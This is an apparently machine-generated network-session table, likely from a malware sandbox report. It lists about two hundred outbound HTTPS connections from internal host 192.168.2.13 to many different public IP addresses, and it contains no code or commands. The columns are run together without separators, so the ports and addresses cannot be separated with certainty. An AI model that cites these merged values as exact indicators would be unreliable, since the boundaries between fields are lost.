                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23272192.168.2.134635677.43.12.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23273192.168.2.133664623.42.239.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23274192.168.2.13478885.161.1.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23275192.168.2.1344398149.164.7.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23276192.168.2.1333326117.164.233.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23277192.168.2.136093467.3.202.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23278192.168.2.1339512140.100.183.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23279192.168.2.1346620137.51.12.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23280192.168.2.134640061.234.237.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23281192.168.2.1340270110.32.5.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23282192.168.2.1340618140.237.27.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23283192.168.2.1335318220.114.83.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23284192.168.2.1353674138.115.253.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23285192.168.2.133822818.117.230.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23286192.168.2.1351136121.242.106.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23287192.168.2.1342414168.28.218.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23288192.168.2.135633253.63.167.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23289192.168.2.135258632.220.190.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23290192.168.2.1349158175.123.225.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23291192.168.2.1359196203.175.179.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23292192.168.2.1356906151.229.64.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23293192.168.2.135062886.192.38.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23294192.168.2.134388860.14.250.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23295192.168.2.1356274193.159.218.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23296192.168.2.1351358207.30.30.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23297192.168.2.1343544185.173.15.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23298192.168.2.1334016210.127.97.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23299192.168.2.1359958192.19.69.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23300192.168.2.1334904220.29.38.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23301192.168.2.1334390100.174.36.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23302192.168.2.1342824125.143.206.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23303192.168.2.134350037.20.254.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23304192.168.2.1356248192.211.24.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23305192.168.2.1353196200.9.125.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23306192.168.2.135790852.174.119.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23307192.168.2.134535057.42.155.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23308192.168.2.1354780204.126.58.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23309192.168.2.1342066126.183.4.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23310192.168.2.1353398168.204.124.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23311192.168.2.1360798157.177.191.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23312192.168.2.1343166222.253.159.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23313192.168.2.133442468.41.77.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23314192.168.2.133606886.32.91.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23315192.168.2.1348394212.186.106.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23316192.168.2.1356342196.183.235.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23317192.168.2.1359866171.213.146.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23318192.168.2.1356830176.196.216.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23319192.168.2.1359316129.245.180.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23320192.168.2.1359024104.202.54.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23321192.168.2.133895672.194.218.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23322192.168.2.1333550173.202.46.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23323192.168.2.13477429.151.169.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23324192.168.2.136068613.222.210.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23325192.168.2.1348484150.25.8.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23326192.168.2.135786042.82.133.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23327192.168.2.133812269.210.10.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23328192.168.2.1352180203.120.208.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23329192.168.2.1334806173.9.76.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23330192.168.2.1345834207.253.129.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23331192.168.2.134881443.25.93.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23332192.168.2.134721872.190.10.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23333192.168.2.1338748134.116.75.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23334192.168.2.1339786217.203.43.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23335192.168.2.134638894.35.241.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23336192.168.2.1337058193.38.142.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23337192.168.2.1354886182.92.118.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23338192.168.2.1360054197.196.72.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23339192.168.2.1340116177.50.186.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23340192.168.2.133560886.221.32.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23341192.168.2.1342088103.240.18.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23342192.168.2.1340172166.54.199.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23343192.168.2.134112043.251.89.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23344192.168.2.1355912109.187.43.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23345192.168.2.1337320145.251.9.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23346192.168.2.135524817.94.99.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23347192.168.2.1350290114.252.130.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23348192.168.2.133493088.55.180.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23349192.168.2.1348104106.18.130.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23350192.168.2.1336610135.121.145.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23351192.168.2.134060485.27.227.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23352192.168.2.135734042.136.42.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23353192.168.2.133656857.218.203.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23354192.168.2.135868059.113.33.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23355192.168.2.1353146130.179.229.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23356192.168.2.133643098.233.111.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23357192.168.2.1338210171.216.173.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23358192.168.2.1355970183.35.65.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23359192.168.2.134334863.185.156.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23360192.168.2.13404061.93.243.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23361192.168.2.1337374109.164.30.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23362192.168.2.134438883.116.209.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23363192.168.2.1334112108.3.19.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23364192.168.2.1342874207.118.90.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23365192.168.2.134663418.175.59.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23366192.168.2.1346200222.178.76.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23367192.168.2.134090660.140.201.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23368192.168.2.135062889.83.223.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23369192.168.2.135576266.124.157.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23370192.168.2.134346897.1.158.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23371192.168.2.1334796140.215.55.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23372192.168.2.1333230222.142.253.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23373192.168.2.135971236.115.204.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23374192.168.2.1350328195.198.127.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23375192.168.2.133646437.53.204.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23376192.168.2.1344794189.35.7.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23377192.168.2.134336084.123.103.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23378192.168.2.1358662220.86.93.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23379192.168.2.135190049.91.249.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23380192.168.2.1358814109.251.142.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23381192.168.2.1355766164.95.142.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23382192.168.2.1353696173.183.244.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23383192.168.2.1354640140.21.47.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23384192.168.2.133760085.48.164.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23385192.168.2.1338488196.244.196.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23386192.168.2.136070839.82.106.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23387192.168.2.133940449.3.174.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23388192.168.2.1336706134.240.17.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23389192.168.2.1348386177.234.169.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23390192.168.2.133915267.41.53.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23391192.168.2.135735244.170.198.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23392192.168.2.134556444.212.88.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23393192.168.2.133984019.167.179.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23394192.168.2.133652294.1.233.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23395192.168.2.1347040157.35.147.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23396192.168.2.1335592170.213.227.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23397192.168.2.1334600113.143.209.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23398192.168.2.135551464.226.133.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23399192.168.2.1345214185.187.230.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23400192.168.2.1355670201.189.22.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23401192.168.2.1360240101.230.158.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23402192.168.2.133466437.44.107.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23403192.168.2.1347242174.192.15.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23404192.168.2.134611067.104.33.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23405192.168.2.1349598108.174.87.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23406192.168.2.133877447.118.133.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23407192.168.2.134766448.104.152.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23408192.168.2.1338490133.100.135.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23409192.168.2.134874697.20.24.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23410192.168.2.136005877.91.64.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23411192.168.2.1358044108.191.184.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23412192.168.2.135458849.46.102.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23413192.168.2.1348824168.30.233.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23414192.168.2.135955470.109.189.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23415192.168.2.1339206180.51.171.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23416192.168.2.135426436.253.239.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23417192.168.2.1346222165.224.209.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23418192.168.2.1342214110.167.219.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23419192.168.2.135995472.104.97.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23420192.168.2.13552845.227.240.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23421192.168.2.1356202213.26.167.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23422192.168.2.136059627.163.47.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23423192.168.2.1351820213.116.213.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23424192.168.2.1351910134.26.21.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23425192.168.2.1343710220.234.227.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23426192.168.2.1339728108.164.186.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23427192.168.2.1339706147.206.128.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23428192.168.2.135674653.144.6.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23429192.168.2.1345980194.193.225.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23430192.168.2.1337014220.27.14.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23431192.168.2.1354882130.218.82.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23432192.168.2.1356362121.15.5.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23433192.168.2.1360702199.214.68.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23434192.168.2.1345304125.136.243.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23435192.168.2.1348448211.4.51.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23436192.168.2.1359468186.117.247.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23437192.168.2.1342008102.179.212.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23438192.168.2.1335218213.108.124.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23439192.168.2.1344228208.37.55.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23440192.168.2.134257886.231.91.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23441192.168.2.1354534105.246.176.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23442192.168.2.1341752208.59.188.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23443192.168.2.1356838211.4.45.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23444192.168.2.1348344182.212.92.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23445192.168.2.13465685.92.99.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23446192.168.2.1351140119.33.78.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23447192.168.2.1355908197.43.249.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23448192.168.2.1357860171.52.199.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23449192.168.2.1339050124.193.9.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23450192.168.2.1336208169.30.128.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23451192.168.2.1349008213.12.41.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23452192.168.2.1353904166.79.185.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23453192.168.2.1343416155.140.139.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23454192.168.2.1341446165.47.39.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23455192.168.2.1345270149.195.186.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23456192.168.2.135652659.194.248.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23457192.168.2.134234839.3.127.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23458192.168.2.1337444124.45.184.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23459192.168.2.1336328210.20.182.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23460192.168.2.1347590176.165.239.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23461192.168.2.135003843.223.57.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23462192.168.2.1358662154.244.181.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23463192.168.2.135274883.93.150.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23464192.168.2.135779452.212.240.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23465192.168.2.1350220115.41.229.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23466192.168.2.134331849.100.157.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23467192.168.2.136021069.96.124.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23468192.168.2.135755619.128.152.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23469192.168.2.134608624.159.109.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23470192.168.2.1354430145.229.89.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23471192.168.2.1350256161.88.183.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23472192.168.2.1349934110.80.233.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23473192.168.2.133322019.245.221.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23474192.168.2.1355340126.3.104.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23475192.168.2.1355660169.75.166.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23476192.168.2.135597860.43.138.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23477192.168.2.1349492153.165.184.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23478192.168.2.1357160200.123.39.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23479192.168.2.1355582173.192.210.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23480192.168.2.134171677.76.113.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23481192.168.2.1332920108.185.78.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23482192.168.2.135843874.96.99.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23483192.168.2.1351490186.70.38.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23484192.168.2.1354486120.20.10.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23485192.168.2.134895477.130.172.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23486192.168.2.135808463.133.48.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23487192.168.2.1344126146.34.8.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23488192.168.2.1342570157.107.37.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23489192.168.2.1343328121.157.2.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23490192.168.2.133317069.254.200.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23491192.168.2.1358482206.153.225.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23492192.168.2.134126087.230.65.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
